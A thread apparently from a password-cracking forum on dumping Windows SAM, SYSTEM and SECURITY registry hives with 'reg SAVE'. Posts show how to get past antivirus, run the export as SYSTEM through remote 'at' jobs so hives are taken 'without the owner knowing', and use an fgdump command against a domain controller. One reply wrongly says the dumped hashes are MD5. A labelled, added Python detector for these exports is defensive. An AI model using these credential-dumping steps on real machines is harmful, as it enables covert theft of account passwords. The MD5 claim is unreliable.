Manually save SAM SYSTEM registry hives

blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3036
Team: HashKiller
Reputation: 4061 Reputation
Offline
Wed, 12 Oct 2011 @ 10:21:26

Been wanting to know how to do this for ages, without using pwdump OR SAMInside OR Cain & Abel etc. Here is how it's done:

You need to use a user who is in the "Administrators" group OR you can create a Scheduled Task and run it as the "SYSTEM" user, and run the following from cmd.exe:

reg SAVE HKLM\SAM [drive]:\sam.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

Once done, use whatever, SAMInside, Cain & Abel, to load hashes and crack 'em.

Q). Why would you want to do it this way?
A). Most server Anti-Virus programs are locked out even though you're in the "Administrators" group, meaning your nice "pwdump" programs will get removed instantly. This way does mean you can get the 2 hives without the AV software interfering.


blandyuk
Wed, 12 Oct 2011 @ 10:22:19

Update on this, to get the Domain Cache logins:

reg SAVE HKLM\SECURITY [drive]:\security.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

With WinXP, you'll get "Access Denied" on the HKLM\SECURITY hive. To get round this, type this in at the command line:

at 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

Note: the 15:00 is the time, please change as necessary. This will create a Windows schedule and use the [machine]\SYSTEM user to run it, which has access. You can also run this remotely on another machine as long as you have local administrator access. Simply run:

at \\[machine] 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

This will save the reg files locally on the \\[machine] so you can simply SMB on and get them without the owner knowing.


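Added example, not part of the thread and not any poster's code: a defender-side check that flags the `reg SAVE` and `at`-scheduled hive exports described in the two posts above when they appear in process-creation command lines. The host names, file paths and the medium/high scoring are assumptions made for illustration.

```python
import re

# Hives named in the posts above: SAM (local account hashes), SECURITY
# (cached domain logons), SYSTEM (holds the key needed to read the other two).
SENSITIVE = {"SAM", "SECURITY", "SYSTEM"}

# reg[.exe] save|export HKLM\<hive> <file>, bare or behind a path/quote.
REG_SAVE = re.compile(
    r'(?:^|[\s"\\])reg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(\w+)"?(?:\s|$)', re.I)
# at[.exe] [\\host] HH:MM <command>: legacy scheduler, job runs as SYSTEM.
AT_JOB = re.compile(
    r'(?:^|[\s"\\])at(?:\.exe)?"?\s+(?:(\\\\\S+)\s+)?\d{1,2}:\d{2}\s', re.I)

def classify(cmdline):
    """Return a finding for one process command line, or None."""
    m = REG_SAVE.search(cmdline)
    if not m or m.group(1).upper() not in SENSITIVE:
        return None
    at = AT_JOB.search(cmdline)
    return {"hive": m.group(1).upper(),
            "via_at": at is not None,
            "remote_host": at.group(1).lstrip("\\") if at and at.group(1) else None}

def correlate(events):
    """Score each affected host from (logging_host, command_line) pairs."""
    hives = {}
    for host, cmdline in events:
        f = classify(cmdline)
        if f:  # a remote at job dumps on the target, not on the logging host
            hives.setdefault(f["remote_host"] or host, set()).add(f["hive"])
    # Assumed scoring: SYSTEM together with SAM or SECURITY is the complete pair.
    return {h: "high" if "SYSTEM" in s and s & {"SAM", "SECURITY"} else "medium"
            for h, s in hives.items()}

# Constructed sample command lines (as from process-creation logging).
EVENTS = [
    ("WS01", r"reg SAVE HKLM\SAM C:\temp\sam.hive"),
    ("WS01", r"C:\Windows\System32\reg.exe save HKLM\SYSTEM C:\temp\system.hive"),
    ("WS02", r"at 15:00 reg SAVE HKLM\SECURITY C:\temp\security.hive"),
    ("WS03", r"at \\WS04 15:00 reg SAVE HKLM\SECURITY C:\temp\security.hive"),
    ("WS05", r"reg save HKCU\Software\Example C:\backup\example.hiv"),
    ("WS05", r"reg query HKLM\SYSTEM\CurrentControlSet\Control"),
]

if __name__ == "__main__":
    for host, level in sorted(correlate(EVENTS).items()):
        print(host, level)
```

The command lines would normally come from the CommandLine field of Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1.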

Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 16:47:44

Thank you for posting this Blandy, it’s useful stuff!

XP Pro

I have managed to crack my own computer using the method where I copy the files from my local running C drive.

C:\WINDOWS\system32\config\SAM
C:\WINDOWS\system32\config\SYSTEM


Server 2003.

In another test I loaded a server up, (Server 2003) and performed the same as above. However I noticed that I only have my own administrator user name and password in the SAM + SYSTEM files and not the “test” user I had made on the domain.

Do you know how I can do this when I physically have the drive on my desk? I would like to be able to copy all usernames and password hashes from a slave drive (ghost image of the actual server C drive) connected to my computer.

Separate question.
Would I be able to do this via a LAN connection also? I have the Administrator password obviously as it is my domain, but I wondered if it is possible to copy all domain user names and password hashes with or without using remote desktop from a computer on the LAN?

Thank you very much.

blandyuk
Mon, 23 Jan 2012 @ 17:21:50

You cannot get a full list of Active Directory users on a Domain this way; the only way is to either do a pwdump on the shared drive on the domain network OR crack the Domain Cache Cred logins on a computer that is used by users (Windows stores the last 10 domain users and passwords as DCC hashes).

-
edited by blandyuk on 07/01/2013


Hash-IT

Mon, 23 Jan 2012 @ 17:37:15

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive?

Surely the server has to store the details somewhere?

Thanks.


hasheponge

Status: Elite
Joined: Fri, 16 Dec 2011
Posts: 1671
Team:
Reputation: 1128 Reputation
Offline
Mon, 23 Jan 2012 @ 18:18:46

Hash-IT said:

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive?

Surely the server has to store the details somewhere?

Thanks.

You can only extract "cache persistent" (if GPO of domain AD is ok) in your server, but full list of Active Directory users not easy.... use a sniffing and try downgrade to LM&NTLMv1 authentication is possible...


Hash-IT

Mon, 23 Jan 2012 @ 18:30:00

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server!

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled! Ha ha!

Is it all locked down and encrypted or something when server 2003 shuts down?


hasheponge

Tue, 24 Jan 2012 @ 10:27:44

Hash-IT said:

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server! ==> in database on DC (domain controller) see: http://en.wikipedia.org/wiki/Active_Directory#Database

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled ! Ha ha ! ==> lol ;-)

Is it all locked down and encrypted or something when server 2003 shuts down ?


For Attack AD 2003 see:

0 - But you must login with admin domain...

1 - download fgdump

2 - execute:

Code:
fgdump.exe -h ServerAD -u AdminDomain -p passadmindomain

3 - then you extract a file: ServerAD.pwdump ==> Hash is MD5 inside this file...

4 - Try to crack ;-)

edited by hasheponge on 24/01/2012


Hash-IT

Tue, 24 Jan 2012 @ 22:28:57

Thanks hasheponge

I got reading that link you kindly supplied me and the program also and completely lost track of time. So I haven't long to write just now but I just wanted to say thank you for posting and setting me off in the right direction!

I will most likely come back later!! Ha ha!

